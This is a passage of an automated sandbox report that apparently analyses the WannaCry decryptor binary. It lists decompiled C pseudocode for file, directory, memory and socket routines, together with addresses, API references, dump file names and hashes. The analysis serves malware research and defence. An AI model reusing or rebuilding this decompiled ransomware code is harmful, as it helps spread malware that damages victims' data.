								_t28 = SetFilePointer(_t44, 0, 0, 1); // executed
								_t38 = _t38 & 0xffffff00 | _t28 != 0xffffffff;
								goto L11;
							} else {
								 *_t45 = 0x200;
								return 0;
							}
						}
					}
				} else {
					 *_a16 = 0x10000;
					return 0;
				}
			}

0x004108a2
0x004108ab
0x004108c8
0x004108cc
0x004108ce
0x004108d3
0x004108d9
0x004108dd
0x00410915
0x00410919
0x00000000
0x004108df
0x004108e2
0x00410938
0x00410938
0x0041093a
0x00410945
0x00410947
0x00410980
0x00410985
0x00410988
0x0041098b
0x0041098e
0x00410992
0x00410999
0x004109a2
0x004109a8
0x004109a8
0x004109b4
0x004109bb
0x0041094e
0x00410956
0x0041095d
0x00410962
0x00410965
0x00410969
0x0041096d
0x00410970
0x00410973
0x0041097b
0x0041097b
0x004108e4
0x004108fb
0x00410901
0x00410906
0x00410920
0x00410925
0x0041092c
0x00410935
0x00000000
0x00410908
0x00410908
0x00410914
0x00410914
0x00410906
0x004108e2
0x004108b7
0x004108be
0x004108c7
0x004108c7

APIs

CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,FFFFFFFF,?,00000000,?,00411CAF,?,?,FFFFFFFF,?), ref: 004108FB
SetFilePointer.KERNELBASE(?,00000000,00000000,00000001,FFFFFFFF,?,00000000,?,00411CAF,?,?,FFFFFFFF,?), ref: 0041092C
#823.MFC42(00000020,?,00411CAF,?,?,FFFFFFFF,?), ref: 0041093A
SetFilePointer.KERNELBASE(?,00000000,00000000,00000001,?,?), ref: 004109A2

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: File$Pointer$#823Create
String ID:
API String ID: 3407337251-0
Opcode ID: c0329c9cd5499b30d561a7d1ea4c749812c658726ada96262fbe16ef4aa413c9
Instruction ID: 085c1855c78cd49c3d24b3d31d21a090ac304bae7dbf1d621fd5eca193cafac9
Opcode Fuzzy Hash: c0329c9cd5499b30d561a7d1ea4c749812c658726ada96262fbe16ef4aa413c9
Instruction Fuzzy Hash: BD31A3712943418FE331CF29E84179BBBE1AB85720F14891EE1D597781D3B6A4C8CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00412250 Relevance: 6.1, APIs: 4, Instructions: 100
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00412250(CHAR* _a4, void* _a8) {
				void _v260;
				char _v520;
				long _t16;
				void* _t17;
				int _t22;
				void* _t29;
				CHAR* _t32;
				signed int _t33;
				signed int _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;
				signed int _t47;
				signed int _t51;
				signed int _t52;
				void* _t56;
				void* _t83;
				void* _t85;
				void* _t86;
				void* _t87;
				char* _t88;
				char* _t93;

				_t88 =  &_v520;
				_t32 = _a4;
				if(_t32 != 0) {
					_t16 = GetFileAttributesA(_t32); // executed
					if(_t16 == 0xffffffff) {
						_t16 = CreateDirectoryA(_t32, 0);
					}
				}
				_t87 = _a8;
				_t34 =  *_t87;
				if(_t34 == 0) {
					L15:
					return _t16;
				} else {
					_t17 = _t87;
					_t56 = _t87;
					do {
						if(_t34 == 0x2f || _t34 == 0x5c) {
							_t17 = _t56;
						}
						_t34 =  *(_t56 + 1);
						_t56 = _t56 + 1;
					} while (_t34 != 0);
					if(_t17 != _t87) {
						_t86 = _t87;
						_t51 = _t17 - _t87;
						_t52 = _t51 >> 2;
						memcpy( &_v260, _t86, _t52 << 2);
						_t29 = memcpy(_t86 + _t52 + _t52, _t86, _t51 & 0x00000003);
						_t93 =  &(_t88[0x18]);
						_t34 = 0;
						_t93[_t29 + 0x114] = 0;
						E00412250(_t32,  &_v260);
						_t88 =  &(_t93[8]);
					}
					_v520 = 0;
					if(_t32 != 0) {
						asm("repne scasb");
						_t46 =  !(_t34 | 0xffffffff);
						_t85 = _t32 - _t46;
						_t47 = _t46 >> 2;
						memcpy(_t85 + _t47 + _t47, _t85, memcpy( &_v520, _t85, _t47 << 2) & 0x00000003);
						_t88 =  &(_t88[0x18]);
						_t34 = 0;
					}
					asm("repne scasb");
					_t36 =  !(_t34 | 0xffffffff);
					_t83 = _t87 - _t36;
					_t33 = _t36;
					asm("repne scasb");
					_t39 = _t33 >> 2;
					memcpy( &_v520 - 1, _t83, _t39 << 2);
					memcpy(_t83 + _t39 + _t39, _t83, _t33 & 0x00000003);
					_t16 = GetFileAttributesA( &_v520); // executed
					if(_t16 != 0xffffffff) {
						goto L15;
					} else {
						_t22 = CreateDirectoryA( &_v520, 0); // executed
						return _t22;
					}
				}
			}

0x00412250
0x00412257
0x00412261
0x00412264
0x0041226d
0x00412272
0x00412272
0x0041226d
0x00412278
0x0041227f
0x00412284
0x0041235a
0x0041235a
0x0041228a
0x0041228a
0x0041228c
0x0041228e
0x00412291
0x00412298
0x00412298
0x0041229a
0x0041229d
0x0041229e
0x004122a6
0x004122aa
0x004122ac
0x004122b7
0x004122ba
0x004122c1
0x004122c1
0x004122c1
0x004122c3
0x004122d4
0x004122d9
0x004122d9
0x004122de
0x004122e3
0x004122f0
0x004122f2
0x004122f8
0x004122fc
0x00412306
0x00412306
0x00412306
0x00412306
0x00412313
0x00412315
0x00412319
0x0041231b
0x00412322
0x00412327
0x0041232a
0x00412336
0x00412338
0x00412343
0x00000000
0x00412345
0x0041234c
0x00000000
0x0041234c
0x00412343

APIs

GetFileAttributesA.KERNELBASE(?,?,?), ref: 00412264
CreateDirectoryA.KERNEL32(?,00000000), ref: 00412272
GetFileAttributesA.KERNELBASE(00000000), ref: 00412338
CreateDirectoryA.KERNELBASE(?,00000000,?,?), ref: 0041234C

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: AttributesCreateDirectoryFile
String ID:
API String ID: 3401506121-0
Opcode ID: 5edde3796adf685aed60d110adb647f247c117a4bec97746d5288a2958dab9aa
Instruction ID: eaae320e7248a4b774ebe1124a4f316430e5356865ecc18a96ed259e18cc5035
Opcode Fuzzy Hash: 5edde3796adf685aed60d110adb647f247c117a4bec97746d5288a2958dab9aa
Instruction Fuzzy Hash: 6F310331204B0847C72889389D957FFBBC6ABD4320F544B3EF966C72C1DEB989588299

Uniqueness

Uniqueness Score: -1.00%

Function 00412A00 Relevance: 6.0, APIs: 4, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00412A00(intOrPtr* _a4) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t14;
				intOrPtr _t16;
				void* _t18;

				_t14 = _a4;
				if(_t14 != 0) {
					if( *_t14 == 1) {
						_t2 = _t14 + 4; // 0x5d5e5f01
						_t16 =  *_t2;
						 *0x4220dc = E004127A0(_t16);
						if(_t16 != 0) {
							_t9 =  *((intOrPtr*)(_t16 + 0x138));
							if(_t9 != 0) {
								_push(_t9);
								L00412C98();
								_t18 = _t18 + 4;
							}
							_t10 =  *((intOrPtr*)(_t16 + 0x13c));
							 *((intOrPtr*)(_t16 + 0x138)) = 0;
							if(_t10 != 0) {
								_push(_t10); // executed
								L00412C98(); // executed
								_t18 = _t18 + 4;
							}
							_push(_t16);
							 *((intOrPtr*)(_t16 + 0x13c)) = 0;
							L00412C98();
							_t18 = _t18 + 4;
						}
						_push(_t14); // executed
						L00412C98(); // executed
						return  *0x4220dc;
					} else {
						 *0x4220dc = 0x80000;
						return 0x80000;
					}
				} else {
					 *0x4220dc = 0x10000;
					return 0x10000;
				}
			}

0x00412a01
0x00412a07
0x00412a18
0x00412a27
0x00412a27
0x00412a33
0x00412a38
0x00412a3a
0x00412a42
0x00412a44
0x00412a45
0x00412a4a
0x00412a4a
0x00412a4d
0x00412a53
0x00412a5f
0x00412a61
0x00412a62
0x00412a67
0x00412a67
0x00412a6a
0x00412a6b
0x00412a75
0x00412a7a
0x00412a7a
0x00412a7d
0x00412a7e
0x00412a8d
0x00412a1a
0x00412a20
0x00412a25
0x00412a25
0x00412a09
0x00412a0f
0x00412a14
0x00412a14

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8234c34db72d3a0399257c77a01998e30a4dd5d20ae4f1b0c75e851605a6604e
Instruction ID: 94773d8abf21b8992377dbaff6472308c4204eb390e4227f2b12783aedecbb61
Opcode Fuzzy Hash: 8234c34db72d3a0399257c77a01998e30a4dd5d20ae4f1b0c75e851605a6604e
Instruction Fuzzy Hash: 070121B16016109BDA209F29EA417CBB3989F40354F08443BE545D7310F7F8E9E5CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040DAD0 Relevance: 6.0, APIs: 4, Instructions: 45networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 0040DB05
send.WS2_32(?,?,00000001,00000000), ref: 0040DB17
shutdown.WS2_32(?,00000002), ref: 0040DB23
closesocket.WS2_32(?), ref: 0040DB2D

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: closesocketsendsetsockoptshutdown
String ID:
API String ID: 4063721217-0
Opcode ID: b8ea9e4fb017428832e7fdcfab5aceec40e53c9ca13a03ff53aa9a0524c23656
Instruction ID: 511c5ca045328faec3d78f5435f76df0282562355462c5d2c83a81ecee0c9610
Opcode Fuzzy Hash: b8ea9e4fb017428832e7fdcfab5aceec40e53c9ca13a03ff53aa9a0524c23656
Instruction Fuzzy Hash: 9D014075200B40ABD3208B28C849B97B7A5AF89721F808B2CF6A9962D0D7B4A4088795

Uniqueness

Uniqueness Score: -1.00%

Function 004043E0 Relevance: 4.5, APIs: 3, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E004043E0(void* __ecx) {
				void* _t3;

				_push(1);
				_push(0x100);
				_push(0);
				L00412DDC();
				_t3 = __ecx + 0x40;
				_push(_t3); // executed
				L00412DD6(); // executed
				 *((char*)(__ecx + 0x5a)) = 0;
				L00412C14();
				return _t3;
			}

0x004043e1
0x004043e3
0x004043ea
0x004043ec
0x004043f1
0x004043f6
0x004043f7
0x004043fe
0x00404402
0x00404408

APIs

#4284.MFC42(00000000,00000100,00000001), ref: 004043EC
#3874.MFC42(?,00000000,00000100,00000001), ref: 004043F7
#5277.MFC42 ref: 00404402

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #3874#4284#5277
String ID:
API String ID: 1717392697-0
Opcode ID: 4114d52f3e371674d2295fde4232c802f8929f5cfba066acaa82d75807d1c039
Instruction ID: 168dd717f23fd29799672b21daad70d98dc1c3a6295a550393a3fd33bd33aa1c
Opcode Fuzzy Hash: 4114d52f3e371674d2295fde4232c802f8929f5cfba066acaa82d75807d1c039
Instruction Fuzzy Hash: B1D012303487645AE974B266BA0BBDB5A999B45B18F04044FF2459F2C1D9D858D083E5

Uniqueness

Uniqueness Score: -1.00%

Function 00411660 Relevance: 3.9, APIs: 3, Instructions: 156
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00411660() {
				signed int _t57;
				signed int _t59;
				unsigned int _t65;
				intOrPtr _t66;
				signed int _t68;
				signed int _t71;
				signed char _t86;
				intOrPtr* _t100;
				void* _t101;
				signed int _t103;
				void* _t105;
				void* _t106;
				void* _t107;
				void* _t108;

				_t100 =  *((intOrPtr*)(_t105 + 0x18));
				if(_t100 != 0) {
					__eflags =  *(_t100 + 0x18);
					if( *(_t100 + 0x18) != 0) {
						__eflags =  *(_t100 + 0x7c);
						if(__eflags != 0) {
							E00411AC0(_t100);
							_t105 = _t105 + 4;
						}
						_t57 = E00411460(__eflags, _t100, _t105 + 0x14, _t105 + 0x18, _t105 + 0xc);
						_t106 = _t105 + 0x10;
						__eflags = _t57;
						if(_t57 == 0) {
							_t101 = malloc(0x84);
							_t107 = _t106 + 4;
							__eflags = _t101;
							if(_t101 != 0) {
								_t59 = malloc(0x4000); // executed
								 *_t101 = _t59;
								 *((intOrPtr*)(_t101 + 0x44)) =  *((intOrPtr*)(_t107 + 0x1c));
								_t108 = _t107 + 4;
								__eflags = _t59;
								 *((intOrPtr*)(_t101 + 0x48)) =  *((intOrPtr*)(_t107 + 0x10));
								 *((intOrPtr*)(_t101 + 0x4c)) = 0;
								if(_t59 != 0) {
									 *((intOrPtr*)(_t101 + 0x40)) = 0;
									__eflags =  *(_t100 + 0x34);
									 *(_t101 + 0x54) =  *(_t100 + 0x3c);
									 *((intOrPtr*)(_t101 + 0x50)) = 0;
									 *(_t101 + 0x64) =  *(_t100 + 0x34);
									 *((intOrPtr*)(_t101 + 0x60)) =  *_t100;
									__eflags =  *(_t100 + 0x34) != 0;
									 *((intOrPtr*)(_t101 + 0x68)) =  *((intOrPtr*)(_t100 + 0xc));
									 *((intOrPtr*)(_t101 + 0x18)) = 0;
									if( *(_t100 + 0x34) != 0) {
										_t25 = _t101 + 4; // 0x4
										 *((intOrPtr*)(_t101 + 0x24)) = 0;
										 *((intOrPtr*)(_t101 + 0x28)) = 0;
										 *((intOrPtr*)(_t101 + 0x2c)) = 0;
										_t71 = E00410380(_t25);
										_t108 = _t108 + 4;
										__eflags = _t71;
										if(_t71 == 0) {
											 *((intOrPtr*)(_t101 + 0x40)) = 1;
										}
									}
									 *((intOrPtr*)(_t101 + 0x58)) =  *((intOrPtr*)(_t100 + 0x40));
									 *((intOrPtr*)(_t101 + 0x5c)) =  *((intOrPtr*)(_t100 + 0x44));
									 *(_t101 + 0x6c) =  *(_t100 + 0x30) & 0x00000001;
									_t86 =  *(_t100 + 0x30) >> 3;
									__eflags = _t86 & 0x00000001;
									if((_t86 & 0x00000001) == 0) {
										_t65 =  *(_t100 + 0x3c) >> 0x18;
										__eflags = _t65;
										 *(_t101 + 0x80) = _t65;
									} else {
										 *(_t101 + 0x80) =  *(_t100 + 0x38) >> 8;
									}
									_t103 =  *(_t108 + 0x20);
									_t45 = _t101 + 0x70; // 0x70
									_t79 = _t45;
									asm("sbb ecx, ecx");
									 *_t45 = 0x12345678;
									 *((intOrPtr*)(_t101 + 0x74)) = 0x23456789;
									__eflags = _t103;
									 *(_t101 + 0x7c) =  ~( *(_t101 + 0x6c)) & 0x0000000c;
									 *((intOrPtr*)(_t101 + 0x78)) = 0x34567890;
									if(_t103 != 0) {
										while(1) {
											_t68 =  *_t103;
											__eflags = _t68;
											if(_t68 == 0) {
												goto L21;
											}
											E004100D0(_t79, _t68);
											_t108 = _t108 + 8;
											_t103 = _t103 + 1;
											__eflags = _t103;
											if(_t103 != 0) {
												continue;
											}
											goto L21;
										}
									}
									L21:
									_t66 =  *((intOrPtr*)(_t108 + 0x14));
									 *((intOrPtr*)(_t101 + 8)) = 0;
									_t53 = _t66 + 0x1e; // 0x345678ae
									__eflags = 0;
									 *((intOrPtr*)(_t101 + 0x3c)) =  *((intOrPtr*)(_t100 + 0x78)) + _t53;
									 *(_t100 + 0x7c) = _t101;
									return 0;
								} else {
									free(_t101);
									return 0xffffff98;
								}
							} else {
								return 0xffffff98;
							}
						} else {
							return 0xffffff99;
						}
					} else {
						return 0xffffff9a;
					}
				} else {
					return 0xffffff9a;
				}
			}

0x00411666
0x0041166e
0x0041167c
0x0041167f
0x0041168d
0x00411690
0x00411693
0x00411698
0x00411698
0x004116ab
0x004116b0
0x004116b3
0x004116b5
0x004116cd
0x004116cf
0x004116d2
0x004116d4
0x004116e7
0x004116ec
0x004116f2
0x004116f9
0x004116fc
0x004116fe
0x00411701
0x00411704
0x0041171b
0x00411726
0x00411728
0x0041172b
0x00411731
0x00411739
0x0041173f
0x00411741
0x00411744
0x00411747
0x00411749
0x0041174c
0x00411750
0x00411753
0x00411756
0x0041175b
0x0041175e
0x00411760
0x00411762
0x00411762
0x00411760
0x0041176c
0x00411772
0x0041177a
0x00411780
0x00411783
0x00411786
0x00411799
0x00411799
0x0041179c
0x00411788
0x0041178e
0x0041178e
0x004117a6
0x004117aa
0x004117aa
0x004117af
0x004117b1
0x004117ba
0x004117c1
0x004117c3
0x004117c6
0x004117cd
0x004117cf
0x004117cf
0x004117d2
0x004117d4
0x00000000
0x00000000
0x004117d8
0x004117dd
0x004117e0
0x004117e0
0x004117e1
0x00000000
0x00000000
0x00000000
0x004117e1
0x004117cf
0x004117e3
0x004117e6
0x004117ea
0x004117f2
0x004117f6
0x004117f8
0x004117fb
0x00411804
0x00411706
0x00411707
0x0041171a
0x0041171a
0x004116d8
0x004116e1
0x004116e1
0x004116b9
0x004116c2
0x004116c2
0x00411683
0x0041168c
0x0041168c
0x00411672
0x0041167b
0x0041167b

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d771c3cdc0376eb06813951ce938a924a88f856aba0395dbcbb3fe4ec20f6b6d
Instruction ID: 97d1101cb4dc6e06905e0d83e2a099da94edd87715b03694c0ad860931ce0dc9
Opcode Fuzzy Hash: d771c3cdc0376eb06813951ce938a924a88f856aba0395dbcbb3fe4ec20f6b6d
Instruction Fuzzy Hash: 7F51D2B5600B018FC720DF2AE880597B7E0BF84314B544A2EEA9A83751D339F499CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00410AF0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00410AF0(long _a4, signed int _a8, char _a12, char _a16) {
				long _t26;
				signed int _t28;
				int _t31;
				intOrPtr* _t34;
				intOrPtr _t36;
				signed int _t37;
				signed int _t38;
				intOrPtr _t47;
				void* _t64;
				signed int _t66;

				_t1 =  &_a16; // 0x410d5a
				_t34 =  *_t1;
				_t66 = _a8;
				_t3 =  &_a12; // 0x410d5a
				_t26 = _t66 *  *_t3;
				if( *_t34 == 0) {
					_t47 =  *((intOrPtr*)(_t34 + 0x1c));
					_t36 =  *((intOrPtr*)(_t34 + 0x18));
					if(_t47 + _t26 > _t36) {
						_t26 = _t36 - _t47;
					}
					_t17 =  &_a4; // 0x410d5a
					_t37 = _t26;
					_t64 =  *((intOrPtr*)(_t34 + 0x14)) + _t47;
					_t38 = _t37 >> 2;
					memcpy( *_t17, _t64, _t38 << 2);
					_t28 = memcpy(_t64 + _t38 + _t38, _t64, _t37 & 0x00000003);
					 *((intOrPtr*)(_t34 + 0x1c)) =  *((intOrPtr*)(_t34 + 0x1c)) + _t28;
					return _t28 / _t66;
				} else {
					_t31 = ReadFile( *(_t34 + 4), _a4, _t26,  &_a4, 0); // executed
					if(_t31 == 0) {
						 *((char*)(_t34 + 8)) = 1;
					}
					return _a4 / _t66;
				}
			}

0x00410af1
0x00410af1
0x00410af6
0x00410afe
0x00410afe
0x00410b05
0x00410b31
0x00410b34
0x00410b3e
0x00410b42
0x00410b42
0x00410b47
0x00410b4b
0x00410b4d
0x00410b51
0x00410b54
0x00410b5d
0x00410b68
0x00410b6d
0x00410b07
0x00410b18
0x00410b20
0x00410b22
0x00410b22
0x00410b30
0x00410b30

APIs

ReadFile.KERNELBASE(000000FF,00000404,ZA,00000404,00000000,00000000,0000FFFF,00410D5A,00000000,00000404,00000001,?), ref: 00410B18

Strings

ZA, xrefs: 00410AF1, 00410AFE, 00410B47, 00410B12

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: ZA
API String ID: 2738559852-706706751
Opcode ID: 955d7e46bcdd16e9ef88f509da3f750024060405559589d6ed767fd5e6d7c93f
Instruction ID: 40231aa483a0e9c283400923c975ae8b8a6f0891fd27fdec0c6452f8272ca3df
Opcode Fuzzy Hash: 955d7e46bcdd16e9ef88f509da3f750024060405559589d6ed767fd5e6d7c93f
Instruction Fuzzy Hash: F401CE723042008BCB18CE18D890AABB7EAABC8610B0481ADEC498B305DA75EC15C761

Uniqueness

Uniqueness Score: -1.00%

Function 004133E6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 28%

			E004133E6(void* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16) {

				_t1 =  &_a16; // 0x413236
				_push( *_t1);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				L0041343E(); // executed
				return __eax;
			}

0x004133e6
0x004133e6
0x004133ea
0x004133ee
0x004133f2
0x004133f6
0x004133fb

APIs

#1576.MFC42(?,?,?,62A,00413236,00000000,?,0000000A), ref: 004133F6

Strings

62A, xrefs: 004133E6

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #1576
String ID: 62A
API String ID: 1976119259-856450375
Opcode ID: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
Instruction ID: 1789da96975510f8b15a36ac976bc3503c656fbbd280c19756f03076dd05f2b6
Opcode Fuzzy Hash: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
Instruction Fuzzy Hash: AFB008360193D6ABCB12DE91890196ABAA2BB98305F484C1DB2A50146187668568AB16

Uniqueness

Uniqueness Score: -1.00%

Function 00410A50 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00410A50(intOrPtr* _a4, long _a8, LONG* _a12) {
				intOrPtr* _t18;
				intOrPtr _t28;
				LONG* _t29;
				LONG* _t35;

				_t18 = _a4;
				_t28 =  *_t18;
				if(_t28 == 0) {
					L12:
					_t29 = _a12;
					if(_t29 != 0) {
						if(_t29 != 1) {
							if(_t29 == 2) {
								 *((intOrPtr*)(_t18 + 0x1c)) =  *((intOrPtr*)(_t18 + 0x18)) + _a8;
							}
							return 0;
						} else {
							 *((intOrPtr*)(_t18 + 0x1c)) =  *((intOrPtr*)(_t18 + 0x1c)) + _a8;
							return 0;
						}
					} else {
						 *((intOrPtr*)(_t18 + 0x1c)) = _a8;
						return 0;
					}
				} else {
					if( *((intOrPtr*)(_t18 + 1)) == 0) {
						if(_t28 == 0) {
							goto L12;
						} else {
							return 0x1d;
						}
					} else {
						_t35 = _a12;
						if(_t35 != 0) {
							if(_t35 != 1) {
								if(_t35 != 2) {
									return 0x13;
								} else {
									_push(_t35);
									goto L8;
								}
							} else {
								_push(_t35);
								L8:
								SetFilePointer( *(_t18 + 4), _a8, 0, ??); // executed
								return 0;
							}
						} else {
							SetFilePointer( *(_t18 + 4),  *((intOrPtr*)(_t18 + 0xc)) + _a8, _t35, _t35); // executed
							return 0;
						}
					}
				}
			}

0x00410a50
0x00410a54
0x00410a58
0x00410ab4
0x00410ab4
0x00410aba
0x00410ac9
0x00410add
0x00410ae8
0x00410ae8
0x00410aed
0x00410acb
0x00410ad4
0x00410ad9
0x00410ad9
0x00410abc
0x00410ac0
0x00410ac5
0x00410ac5
0x00410a5a
0x00410a5f
0x00410aac
0x00000000
0x00410aae
0x00410ab3
0x00410ab3
0x00410a61
0x00410a61
0x00410a67
0x00410a85
0x00410a8d
0x00410aa9
0x00410a8f
0x00410a8f
0x00000000
0x00410a8f
0x00410a87
0x00410a87
0x00410a90
0x00410a9b
0x00410aa3
0x00410aa3
0x00410a69
0x00410a79
0x00410a81
0x00410a81
0x00410a67
0x00410a5f

APIs

SetFilePointer.KERNELBASE(?,?,00000000,00000000,00410CA4,?,00000000,00000002,00000000,?,00000000,FFFFFFFF,?), ref: 00410A79
SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00410CA4,?,00000000,00000002,00000000,?,00000000,FFFFFFFF,?), ref: 00410A9B

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
